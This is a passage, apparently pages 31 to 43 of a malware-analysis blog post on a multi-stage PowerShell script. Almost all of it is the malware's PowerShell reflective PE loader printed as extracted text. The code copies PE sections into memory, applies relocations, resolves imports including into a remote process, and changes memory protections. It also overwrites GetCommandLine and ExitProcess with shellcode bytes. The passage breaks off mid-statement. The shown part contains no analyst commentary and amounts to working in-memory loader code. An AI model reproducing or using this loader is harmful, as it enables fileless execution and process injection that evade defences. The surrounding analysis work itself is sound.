*[System.Runtime.InteropServices.Marshal] ::SizeOf( [Type] $Win\r\n$SectionHeader   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $SectionHeaderPtr ,[Type] $Win32Types .IMAGE_SECT\r\n[IntPtr] $SectionDestAddr   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .PEHandle)\r\n( [Int64] $SectionHeader .VirtualAddress))\r\n$SizeOfRawData   =$SectionHeader .SizeOfRawData\r\nif   ( $SectionHeader .PointerToRawData-eq   0)\r\n{\r\n$SizeOfRawData   =0\r\n}\r\nif   ( $SizeOfRawData   -gt   $SectionHeader .VirtualSize)\r\n{\r\n$SizeOfRawData   =$SectionHeader .VirtualSize\r\n}\r\nif   ( $SizeOfRawData   -gt   0)\r\n{\r\nTest-MemoryRangeValid   -DebugString\"Copy-Sections::MarshalCopy\"   -PEInfo$PEInfo   -\r\nStartAddress$SectionDestAddr   -Size$SizeOfRawData   |Out-Null\r\n[System.Runtime.InteropServices.Marshal] ::Copy( $PEBytes ,[Int32] $SectionHeader .PointerToRawData,$SectionDestAddr ,$Siz\r\n}\r\nif   ( $SectionHeader .SizeOfRawData-lt   $SectionHeader .VirtualSize)\r\n{\r\n$Difference   =$SectionHeader .VirtualSize-$SizeOfRawData\r\n[IntPtr] $StartAddress   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $SectionDestAddr )\r\n( [Int64] $SizeOfRawData ))\r\nTest-MemoryRangeValid   -DebugString\"Copy-Sections::Memset\"   -PEInfo$PEInfo   -\r\nStartAddress$StartAddress   -Size$Difference   |Out-Null\r\n$Win32Functions .memset.Invoke( $StartAddress ,0,[IntPtr] $Difference )|Out-Null\r\n}\r\n}\r\n}\r\nFunction   Update-MemoryAddresses\r\n{\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 31 of 57\n\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[System.Object]\r\n$PEInfo ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[Int64]\r\n$OriginalImageBase ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Constants ,\r\n[ Parameter ( Position   =3,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Types\r\n)\r\n[Int64] $BaseDifference   =0\r\n$AddDifference   =$true\r\n[UInt32] $ImageBaseRelocSize   =[System.Runtime.InteropServices.Marshal] ::SizeOf( [Type] $Win32Types .IMAGE_BASE_RELOCATION)\r\nif   (( $OriginalImageBase   -eq   [Int64] $PEInfo .EffectivePEHandle)`\r\n-or   ( $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size-eq   0))\r\n{\r\nreturn\r\n}\r\nelseif   (( Compare-Val1GreaterThanVal2AsUInt   ( $OriginalImageBase )( $PEInfo .EffectivePEHandle))-\r\neq   $true )\r\n{\r\n$BaseDifference   =Sub-SignedIntAsUnsigned( $OriginalImageBase )( $PEInfo .EffectivePEHandle)\r\n$AddDifference   =$false\r\n}\r\nelseif   (( Compare-Val1GreaterThanVal2AsUInt   ( $PEInfo .EffectivePEHandle)( $OriginalImageBase ))-\r\neq   $true )\r\n{\r\n$BaseDifference   =Sub-SignedIntAsUnsigned( $PEInfo .EffectivePEHandle)( $OriginalImageBase )\r\n}\r\n[IntPtr] $BaseRelocPtr   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .PEHandle)\r\n( [Int64] $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAdd\r\nwhile ( $true )\r\n{\r\n$BaseRelocationTable   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $BaseRelocPtr ,[Type] $Win32Types .IMAGE_BA\r\nif   ( $BaseRelocationTable .SizeOfBlock-eq   0)\r\n{\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 32 of 57\n\nbreak\r\n}\r\n[IntPtr] $MemAddrBase   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .PEHandle)\r\n( [Int64] $BaseRelocationTable .VirtualAddress))\r\n$NumRelocations   =( $BaseRelocationTable .SizeOfBlock-$ImageBaseRelocSize )/2\r\nfor ( $i   =0;$i   -lt   $NumRelocations ;$i ++)\r\n{\r\n$RelocationInfoPtr   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [IntPtr] $BaseRelocPtr )\r\n( [Int64] $ImageBaseRelocSize   +(2*$i )))\r\n[UInt16] $RelocationInfo   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $RelocationInfoPtr ,[Type]\r\n[UInt16] )\r\n[UInt16] $RelocOffset   =$RelocationInfo   -band   0x0FFF\r\n[UInt16] $RelocType   =$RelocationInfo   -band   0xF000\r\nfor   ( $j   =0;$j   -lt   12;$j ++)\r\n{\r\n$RelocType   =[Math] ::Floor( $RelocType   /2)\r\n}\r\nif   (( $RelocType   -eq   $Win32Constants .IMAGE_REL_BASED_HIGHLOW)`\r\n-or   ( $RelocType   -eq   $Win32Constants .IMAGE_REL_BASED_DIR64))\r\n{\r\n[IntPtr] $FinalAddr   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $MemAddrBase )\r\n( [Int64] $RelocOffset ))\r\n[IntPtr] $CurrAddr   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $FinalAddr ,[Type]\r\n[IntPtr] )\r\nif   ( $AddDifference   -eq   $true )\r\n{\r\n[IntPtr] $CurrAddr   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $CurrAddr )\r\n( $BaseDifference ))\r\n}\r\nelse\r\n{\r\n[IntPtr] $CurrAddr   =[IntPtr] (Sub-SignedIntAsUnsigned( [Int64] $CurrAddr )( $BaseDifference ))\r\n}\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $CurrAddr ,$FinalAddr ,$false )|Out-Null\r\n}\r\nelseif   ( $RelocType   -ne   $Win32Constants .IMAGE_REL_BASED_ABSOLUTE)\r\n{\r\nThrow\"Unknownrelocationfound,relocationvalue:$RelocType,relocationinfo:$RelocationInfo\"\r\n}\r\n}\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 33 of 57\n\n$BaseRelocPtr   =\r\n[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $BaseRelocPtr )\r\n( [Int64] $BaseRelocationTable .SizeOfBlock))\r\n}\r\n}\r\nFunction   Import-DllImports\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[System.Object]\r\n$PEInfo ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Functions ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Types ,\r\n[ Parameter ( Position   =3,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Constants ,\r\n[ Parameter ( Position   =4,Mandatory   =$false )]\r\n[IntPtr]\r\n$RemoteProcHandle\r\n)\r\n$RemoteLoading   =$false\r\nif   ( $PEInfo .PEHandle-ne   $PEInfo .EffectivePEHandle)\r\n{\r\n$RemoteLoading   =$true\r\n}\r\nif   ( $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size-gt   0)\r\n{\r\n[IntPtr] $ImportDescriptorPtr   =Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .PEHandle)\r\n( [Int64] $PEInfo .IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\r\nwhile   ( $true )\r\n{\r\n$ImportDescriptor   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $ImportDescriptorPtr ,[Type] $Win32Types .IMAG\r\nif   ( $ImportDescriptor .Characteristics-eq   0`\r\n-and   $ImportDescriptor .FirstThunk-eq   0`\r\n-and   $ImportDescriptor .ForwarderChain-eq   0`\r\n-and   $ImportDescriptor .Name-eq   0`\r\n-and   $ImportDescriptor .TimeDateStamp-eq   0)\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 34 of 57\n\n{\r\nbreak\r\n}\r\n$ImportDllHandle   =[IntPtr] ::Zero\r\n$ImportDllPathPtr   =( Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .PEHandle)\r\n( [Int64] $ImportDescriptor .Name))\r\n$ImportDllPath   =[System.Runtime.InteropServices.Marshal] ::PtrToStringAnsi( $ImportDllPathPtr )\r\nif   ( $RemoteLoading   -eq   $true )\r\n{\r\n$ImportDllHandle   =Import-DllInRemoteProcess   -RemoteProcHandle$RemoteProcHandle   -\r\nImportDllPathPtr$ImportDllPathPtr\r\n}\r\nelse\r\n{\r\n$ImportDllHandle   =$Win32Functions .LoadLibrary.Invoke( $ImportDllPath )\r\n}\r\nif   (( $ImportDllHandle   -eq   $null )-or   ( $ImportDllHandle   -eq   [IntPtr] ::Zero))\r\n{\r\nthrow\"ErrorimportingDLL,DLLName:$ImportDllPath\"\r\n}\r\n[IntPtr] $ThunkRef   =Add-SignedIntAsUnsigned   ( $PEInfo .PEHandle)( $ImportDescriptor .FirstThunk)\r\n[IntPtr] $OriginalThunkRef   =Add-SignedIntAsUnsigned   ( $PEInfo .PEHandle)\r\n( $ImportDescriptor .Characteristics)\r\n[IntPtr] $OriginalThunkRefVal   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $OriginalThunkRef ,[Type]\r\n[IntPtr] )\r\nwhile   ( $OriginalThunkRefVal   -ne   [IntPtr] ::Zero)\r\n{\r\n$ProcedureName   =''\r\n[IntPtr] $NewThunkRef   =[IntPtr] ::Zero\r\nif ( [Int64] $OriginalThunkRefVal   -lt   0)\r\n{\r\n$ProcedureName   =[Int64] $OriginalThunkRefVal   -band   0xffff\r\n}\r\nelse\r\n{\r\n[IntPtr] $StringAddr   =Add-SignedIntAsUnsigned   ( $PEInfo .PEHandle)( $OriginalThunkRefVal )\r\n$StringAddr   =Add-SignedIntAsUnsigned   $StringAddr   ( [System.Runtime.InteropServices.Marshal] ::SizeOf( [Type][UInt16] ))\r\n$ProcedureName   =[System.Runtime.InteropServices.Marshal] ::PtrToStringAnsi( $StringAddr )\r\n}\r\nif   ( $RemoteLoading   -eq   $true )\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 35 of 57\n\n{\r\n[IntPtr] $NewThunkRef   =Get-RemoteProcAddress   -RemoteProcHandle$RemoteProcHandle   -\r\nRemoteDllHandle$ImportDllHandle   -FunctionName$ProcedureName\r\n}\r\nelse\r\n{\r\nif ( $ProcedureName   -is   [string] )\r\n{\r\n[IntPtr] $NewThunkRef   =$Win32Functions .GetProcAddress.Invoke( $ImportDllHandle ,$ProcedureName )\r\n}\r\nelse\r\n{\r\n[IntPtr] $NewThunkRef   =$Win32Functions .GetProcAddressOrdinal.Invoke( $ImportDllHandle ,$ProcedureName )\r\n}\r\n}\r\nif   ( $NewThunkRef   -eq   $null   -or   $NewThunkRef   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"Newfunctionreferenceisnull,thisisalmostcertainlyabuginthisscript.Function:$ProcedureName.Dll:$ImportDllPath\"\r\n}\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $NewThunkRef ,$ThunkRef ,$false )\r\n$ThunkRef   =Add-SignedIntAsUnsigned   ( [Int64] $ThunkRef )\r\n( [System.Runtime.InteropServices.Marshal] ::SizeOf( [Type]\r\n[IntPtr] ))\r\n[IntPtr] $OriginalThunkRef   =Add-SignedIntAsUnsigned   ( [Int64] $OriginalThunkRef )\r\n( [System.Runtime.InteropServices.Marshal] ::SizeOf( [Type]\r\n[IntPtr] ))\r\n[IntPtr] $OriginalThunkRefVal   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $OriginalThunkRef ,[Type]\r\n[IntPtr] )\r\n}\r\n$ImportDescriptorPtr   =Add-SignedIntAsUnsigned   ( $ImportDescriptorPtr )\r\n( [System.Runtime.InteropServices.Marshal] ::SizeOf( [Type] $Win32Types .IMAGE_IMPOR\r\n}\r\n}\r\n}\r\nFunction   Get-VirtualProtectValue\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[UInt32]\r\n$SectionCharacteristics\r\n)\r\n$ProtectionFlag   =0x0\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 36 of 57\n\nif   (( $SectionCharacteristics   -band   $Win32Constants .IMAGE_SCN_MEM_EXECUTE)\r\n-gt   0)\r\n{\r\nif   (( $SectionCharacteristics   -band   $Win32Constants .IMAGE_SCN_MEM_READ)-gt   0)\r\n{\r\nif   (( $SectionCharacteristics   -band   $Win32Constants .IMAGE_SCN_MEM_WRITE)-gt   0)\r\n{\r\n$ProtectionFlag   =$Win32Constants .PAGE_EXECUTE_READWRITE\r\n}\r\nelse\r\n{\r\n$ProtectionFlag   =$Win32Constants .PAGE_EXECUTE_READ\r\n}\r\n}\r\nelse\r\n{\r\nif   (( $SectionCharacteristics   -band   $Win32Constants .IMAGE_SCN_MEM_WRITE)-gt   0)\r\n{\r\n$ProtectionFlag   =$Win32Constants .PAGE_EXECUTE_WRITECOPY\r\n}\r\nelse\r\n{\r\n$ProtectionFlag   =$Win32Constants .PAGE_EXECUTE\r\n}\r\n}\r\n}\r\nelse\r\n{\r\nif   (( $SectionCharacteristics   -band   $Win32Constants .IMAGE_SCN_MEM_READ)-gt   0)\r\n{\r\nif   (( $SectionCharacteristics   -band   $Win32Constants .IMAGE_SCN_MEM_WRITE)-gt   0)\r\n{\r\n$ProtectionFlag   =$Win32Constants .PAGE_READWRITE\r\n}\r\nelse\r\n{\r\n$ProtectionFlag   =$Win32Constants .PAGE_READONLY\r\n}\r\n}\r\nelse\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 37 of 57\n\n{\r\nif   (( $SectionCharacteristics   -band   $Win32Constants .IMAGE_SCN_MEM_WRITE)-gt   0)\r\n{\r\n$ProtectionFlag   =$Win32Constants .PAGE_WRITECOPY\r\n}\r\nelse\r\n{\r\n$ProtectionFlag   =$Win32Constants .PAGE_NOACCESS\r\n}\r\n}\r\n}\r\nif   (( $SectionCharacteristics   -band   $Win32Constants .IMAGE_SCN_MEM_NOT_CACHED)-gt   0)\r\n{\r\n$ProtectionFlag   =$ProtectionFlag   -bor   $Win32Constants .PAGE_NOCACHE\r\n}\r\nreturn   $ProtectionFlag\r\n}\r\nFunction   Update-MemoryProtectionFlags\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[System.Object]\r\n$PEInfo ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Functions ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Constants ,\r\n[ Parameter ( Position   =3,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Types\r\n)\r\nfor ($i   =0;$i   -lt   $PEInfo .IMAGE_NT_HEADERS.FileHeader.NumberOfSections;$i ++)\r\n{\r\n[IntPtr] $SectionHeaderPtr   =[IntPtr] ( Add-SignedIntAsUnsigned   ( [Int64] $PEInfo .SectionHeaderPtr)\r\n( $i   *[System.Runtime.InteropServices.Marshal] ::SizeOf( [Type] $Win\r\n$SectionHeader   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $SectionHeaderPtr ,[Type] $Win32Types .IMAGE_SECT\r\n[IntPtr] $SectionPtr   =Add-SignedIntAsUnsigned   ( $PEInfo .PEHandle)\r\n( $SectionHeader .VirtualAddress)\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 38 of 57\n\n[UInt32] $ProtectFlag   =\r\nGet-VirtualProtectValue   $SectionHeader .Characteristics\r\n[UInt32] $SectionSize   =$SectionHeader .VirtualSize\r\n[UInt32] $OldProtectFlag   =0\r\nTest-MemoryRangeValid   -DebugString\"Update-MemoryProtectionFlags::VirtualProtect\"   -PEInfo$PEInfo   -\r\nStartAddress$SectionPtr   -Size$SectionSize   |Out-Null\r\n$Success   =$Win32Functions .VirtualProtect.Invoke( $SectionPtr ,$SectionSize ,$ProtectFlag ,[Ref] $OldProtectFlag )\r\nif   ( $Success   -eq   $false )\r\n{\r\nThrow\"Unabletochangememoryprotection\"\r\n}\r\n}\r\n}\r\nFunction   Update-ExeFunctions\r\n{\r\nParam (\r\n[ Parameter ( Position   =0,Mandatory   =$true )]\r\n[System.Object]\r\n$PEInfo ,\r\n[ Parameter ( Position   =1,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Functions ,\r\n[ Parameter ( Position   =2,Mandatory   =$true )]\r\n[System.Object]\r\n$Win32Constants ,\r\n[ Parameter ( Position   =3,Mandatory   =$true )]\r\n[String]\r\n$ExeArguments ,\r\n[ Parameter ( Position   =4,Mandatory   =$true )]\r\n[IntPtr]\r\n$ExeDoneBytePtr\r\n)\r\n$ReturnArray   =@()\r\n$PtrSize   =[System.Runtime.InteropServices.Marshal] ::SizeOf( [Type][IntPtr] )\r\n[UInt32] $OldProtectFlag   =0\r\n[IntPtr] $Kernel32Handle   =$Win32Functions .GetModuleHandle.Invoke( \"Kernel32.dll\" )\r\nif   ( $Kernel32Handle   -eq   [IntPtr] ::Zero)\r\n{\r\nthrow\"Kernel32handlenull\"\r\n}\r\n[IntPtr] $KernelBaseHandle   =$Win32Functions .GetModuleHandle.Invoke( \"KernelBase.dll\" )\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 39 of 57\n\nif   ( $KernelBaseHandle   -eq   [IntPtr] ::Zero)\r\n{\r\nthrow\"KernelBasehandlenull\"\r\n}\r\n$CmdLineWArgsPtr   =[System.Runtime.InteropServices.Marshal] ::StringToHGlobalUni( $ExeArguments )\r\n$CmdLineAArgsPtr   =[System.Runtime.InteropServices.Marshal] ::StringToHGlobalAnsi( $ExeArguments )\r\n[IntPtr] $GetCommandLineAAddr   =$Win32Functions .GetProcAddress.Invoke( $KernelBaseHandle ,\"GetCommandLineA\" )\r\n[IntPtr] $GetCommandLineWAddr   =$Win32Functions .GetProcAddress.Invoke( $KernelBaseHandle ,\"GetCommandLineW\" )\r\nif   ( $GetCommandLineAAddr   -eq   [IntPtr] ::Zero-or   $GetCommandLineWAddr   -eq   [IntPtr] ::Zero)\r\n{\r\nthrow\"GetCommandLineptrnull.GetCommandLineA:$GetCommandLineAAddr.GetCommandLineW:$GetCommandLineWAddr\"\r\n}\r\n[Byte[]] $Shellcode1   =@()\r\nif   ( $PtrSize   -eq   8)\r\n{\r\n$Shellcode1   +=0x48\r\n}\r\n$Shellcode1   +=0xb8\r\n[Byte[]] $Shellcode2   =@(0xc3)\r\n$TotalSize   =$Shellcode1 .Length+$PtrSize   +$Shellcode2 .Length\r\n$GetCommandLineAOrigBytesPtr   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $TotalSize )\r\n$GetCommandLineWOrigBytesPtr   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $TotalSize )\r\n$Win32Functions .memcpy.Invoke( $GetCommandLineAOrigBytesPtr ,$GetCommandLineAAddr ,[UInt64] $TotalSize )|\r\nOut-Null\r\n$Win32Functions .memcpy.Invoke( $GetCommandLineWOrigBytesPtr ,$GetCommandLineWAddr ,[UInt64] $TotalSize )|\r\nOut-Null\r\n$ReturnArray   +=,( $GetCommandLineAAddr ,$GetCommandLineAOrigBytesPtr ,$TotalSize )\r\n$ReturnArray   +=,( $GetCommandLineWAddr ,$GetCommandLineWOrigBytesPtr ,$TotalSize )\r\n[UInt32] $OldProtectFlag   =0\r\n$Success   =$Win32Functions .VirtualProtect.Invoke( $GetCommandLineAAddr ,[UInt32] $TotalSize ,[UInt32]\r\n( $Win32Constants .PAGE_EXECUTE_READWRITE),[Ref] $OldProtectFlag )\r\nif   ( $Success   =$false )\r\n{\r\nthrow\"CalltoVirtualProtectfailed\"\r\n}\r\n$GetCommandLineAAddrTemp   =$GetCommandLineAAddr\r\nWrite-BytesToMemory   -Bytes$Shellcode1   -MemoryAddress$GetCommandLineAAddrTemp\r\n$GetCommandLineAAddrTemp   =Add-SignedIntAsUnsigned   $GetCommandLineAAddrTemp   ( $Shellcode1 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $CmdLineAArgsPtr ,$GetCommandLineAAddrTemp ,$false )\r\n$GetCommandLineAAddrTemp   =Add-SignedIntAsUnsigned   $GetCommandLineAAddrTemp   $PtrSize\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 40 of 57\n\nWrite-BytesToMemory   -Bytes\r\n$Shellcode2   -MemoryAddress$GetCommandLineAAddrTemp\r\n$Win32Functions .VirtualProtect.Invoke( $GetCommandLineAAddr ,[UInt32] $TotalSize ,[UInt32] $OldProtectFlag ,[Ref] $OldP\r\nOut-Null\r\n[UInt32] $OldProtectFlag   =0\r\n$Success   =$Win32Functions .VirtualProtect.Invoke( $GetCommandLineWAddr ,[UInt32] $TotalSize ,[UInt32]\r\n( $Win32Constants .PAGE_EXECUTE_READWRITE),[Ref] $OldProtectFlag )\r\nif   ( $Success   =$false )\r\n{\r\nthrow\"CalltoVirtualProtectfailed\"\r\n}\r\n$GetCommandLineWAddrTemp   =$GetCommandLineWAddr\r\nWrite-BytesToMemory   -Bytes$Shellcode1   -MemoryAddress$GetCommandLineWAddrTemp\r\n$GetCommandLineWAddrTemp   =Add-SignedIntAsUnsigned   $GetCommandLineWAddrTemp   ( $Shellcode1 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $CmdLineWArgsPtr ,$GetCommandLineWAddrTemp ,$false )\r\n$GetCommandLineWAddrTemp   =Add-SignedIntAsUnsigned   $GetCommandLineWAddrTemp   $PtrSize\r\nWrite-BytesToMemory   -Bytes$Shellcode2   -MemoryAddress$GetCommandLineWAddrTemp\r\n$Win32Functions .VirtualProtect.Invoke( $GetCommandLineWAddr ,[UInt32] $TotalSize ,[UInt32] $OldProtectFlag ,[Ref] $OldP\r\nOut-Null\r\n$DllList   =@( \"msvcr70d.dll\" ,\"msvcr71d.dll\" ,\"msvcr80d.dll\" ,\"msvcr90d.dll\" ,\"msvcr100d.dll\" ,\"msvcr110d.dll\" ,\r\n,\"msvcr71.dll\" ,\"msvcr80.dll\" ,\"msvcr90.dll\" ,\"msvcr100.dll\" ,\"msvcr110.dll\" )\r\nforeach   ( $Dll   in   $DllList )\r\n{\r\n[IntPtr] $DllHandle   =$Win32Functions .GetModuleHandle.Invoke( $Dll )\r\nif   ( $DllHandle   -ne   [IntPtr] ::Zero)\r\n{\r\n[IntPtr] $WCmdLnAddr   =$Win32Functions .GetProcAddress.Invoke( $DllHandle ,\"_wcmdln\" )\r\n[IntPtr] $ACmdLnAddr   =$Win32Functions .GetProcAddress.Invoke( $DllHandle ,\"_acmdln\" )\r\nif   ( $WCmdLnAddr   -eq   [IntPtr] ::Zero-or   $ACmdLnAddr   -eq   [IntPtr] ::Zero)\r\n{\r\n\"Error,couldn'tfind_wcmdlnor_acmdln\"\r\n}\r\n$NewACmdLnPtr   =[System.Runtime.InteropServices.Marshal] ::StringToHGlobalAnsi( $ExeArguments )\r\n$NewWCmdLnPtr   =[System.Runtime.InteropServices.Marshal] ::StringToHGlobalUni( $ExeArguments )\r\n$OrigACmdLnPtr   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $ACmdLnAddr ,[Type]\r\n[IntPtr] )\r\n$OrigWCmdLnPtr   =[System.Runtime.InteropServices.Marshal] ::PtrToStructure( $WCmdLnAddr ,[Type]\r\n[IntPtr] )\r\n$OrigACmdLnPtrStorage   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $PtrSize )\r\n$OrigWCmdLnPtrStorage   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $PtrSize )\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $OrigACmdLnPtr ,$OrigACmdLnPtrStorage ,$false )\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $OrigWCmdLnPtr ,$OrigWCmdLnPtrStorage ,$false )\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 41 of 57\n\n$ReturnArray   +=\r\n,( $ACmdLnAddr ,$OrigACmdLnPtrStorage ,$PtrSize )\r\n$ReturnArray   +=,( $WCmdLnAddr ,$OrigWCmdLnPtrStorage ,$PtrSize )\r\n$Success   =$Win32Functions .VirtualProtect.Invoke( $ACmdLnAddr ,[UInt32] $PtrSize ,[UInt32]\r\n( $Win32Constants .PAGE_EXECUTE_READWRITE),[Ref] $OldProtectFlag )\r\nif   ( $Success   =$false )\r\n{\r\nthrow\"CalltoVirtualProtectfailed\"\r\n}\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $NewACmdLnPtr ,$ACmdLnAddr ,$false )\r\n$Win32Functions .VirtualProtect.Invoke( $ACmdLnAddr ,[UInt32] $PtrSize ,[UInt32]\r\n( $OldProtectFlag ),[Ref] $OldProtectFlag )|Out-Null\r\n$Success   =$Win32Functions .VirtualProtect.Invoke( $WCmdLnAddr ,[UInt32] $PtrSize ,[UInt32]\r\n( $Win32Constants .PAGE_EXECUTE_READWRITE),[Ref] $OldProtectFlag )\r\nif   ( $Success   =$false )\r\n{\r\nthrow\"CalltoVirtualProtectfailed\"\r\n}\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $NewWCmdLnPtr ,$WCmdLnAddr ,$false )\r\n$Win32Functions .VirtualProtect.Invoke( $WCmdLnAddr ,[UInt32] $PtrSize ,[UInt32]\r\n( $OldProtectFlag ),[Ref] $OldProtectFlag )|Out-Null\r\n}\r\n}\r\n$ReturnArray   =@()\r\n$ExitFunctions   =@()\r\n[IntPtr] $MscoreeHandle   =$Win32Functions .GetModuleHandle.Invoke( \"mscoree.dll\" )\r\nif   ( $MscoreeHandle   -eq   [IntPtr] ::Zero)\r\n{\r\nthrow\"mscoreehandlenull\"\r\n}\r\n[IntPtr] $CorExitProcessAddr   =$Win32Functions .GetProcAddress.Invoke( $MscoreeHandle ,\"CorExitProcess\" )\r\nif   ( $CorExitProcessAddr   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"CorExitProcessaddressnotfound\"\r\n}\r\n$ExitFunctions   +=$CorExitProcessAddr\r\n[IntPtr] $ExitProcessAddr   =$Win32Functions .GetProcAddress.Invoke( $Kernel32Handle ,\"ExitProcess\" )\r\nif   ( $ExitProcessAddr   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"ExitProcessaddressnotfound\"\r\n}\r\n$ExitFunctions   +=$ExitProcessAddr\r\nhttps://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/\r\nPage 42 of 57\n\n[UInt32] $OldProtectFlag   =\r\n0\r\nforeach   ( $ProcExitFunctionAddr   in   $ExitFunctions )\r\n{\r\n$ProcExitFunctionAddrTmp   =$ProcExitFunctionAddr\r\n[Byte[]] $Shellcode1   =@(0xbb)\r\n[Byte[]] $Shellcode2   =@(0xc6,0x03,0x01,0x83,0xec,0x20,0x83,0xe4,0xc0,0xbb)\r\nif   ( $PtrSize   -eq   8)\r\n{\r\n[Byte[]] $Shellcode1   =@(0x48,0xbb)\r\n[Byte[]] $Shellcode2   =@(0xc6,0x03,0x01,0x48,0x83,0xec,0x20,0x66,0x83,0xe4,0xc0,0x48,0xbb)\r\n}\r\n[Byte[]] $Shellcode3   =@(0xff,0xd3)\r\n$TotalSize   =$Shellcode1 .Length+$PtrSize   +$Shellcode2 .Length+$PtrSize   +$Shellcode3 .Length\r\n[IntPtr] $ExitThreadAddr   =$Win32Functions .GetProcAddress.Invoke( $Kernel32Handle ,\"ExitThread\" )\r\nif   ( $ExitThreadAddr   -eq   [IntPtr] ::Zero)\r\n{\r\nThrow\"ExitThreadaddressnotfound\"\r\n}\r\n$Success   =$Win32Functions .VirtualProtect.Invoke( $ProcExitFunctionAddr ,[UInt32] $TotalSize ,[UInt32] $Win32Constants .\r\nif   ( $Success   -eq   $false )\r\n{\r\nThrow\"CalltoVirtualProtectfailed\"\r\n}\r\n$ExitProcessOrigBytesPtr   =[System.Runtime.InteropServices.Marshal] ::AllocHGlobal( $TotalSize )\r\n$Win32Functions .memcpy.Invoke( $ExitProcessOrigBytesPtr ,$ProcExitFunctionAddr ,[UInt64] $TotalSize )|\r\nOut-Null\r\n$ReturnArray   +=,( $ProcExitFunctionAddr ,$ExitProcessOrigBytesPtr ,$TotalSize )\r\nWrite-BytesToMemory   -Bytes$Shellcode1   -MemoryAddress$ProcExitFunctionAddrTmp\r\n$ProcExitFunctionAddrTmp   =Add-SignedIntAsUnsigned   $ProcExitFunctionAddrTmp   ( $Shellcode1 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $ExeDoneBytePtr ,$ProcExitFunctionAddrTmp ,$false )\r\n$ProcExitFunctionAddrTmp   =Add-SignedIntAsUnsigned   $ProcExitFunctionAddrTmp   $PtrSize\r\nWrite-BytesToMemory   -Bytes$Shellcode2   -MemoryAddress$ProcExitFunctionAddrTmp\r\n$ProcExitFunctionAddrTmp   =Add-SignedIntAsUnsigned   $ProcExitFunctionAddrTmp   ( $Shellcode2 .Length)\r\n[System.Runtime.InteropServices.Marshal] ::StructureToPtr( $ExitThreadAddr ,$ProcExitFunctionAddrTmp ,$false )\r\n$ProcExitFunctionAddrTmp   =Add-SignedIntAsUnsigned   $ProcExitFunctionAddrTmp   $PtrSize\r\nWrite-BytesToMemory   -Bytes$Shellcode3   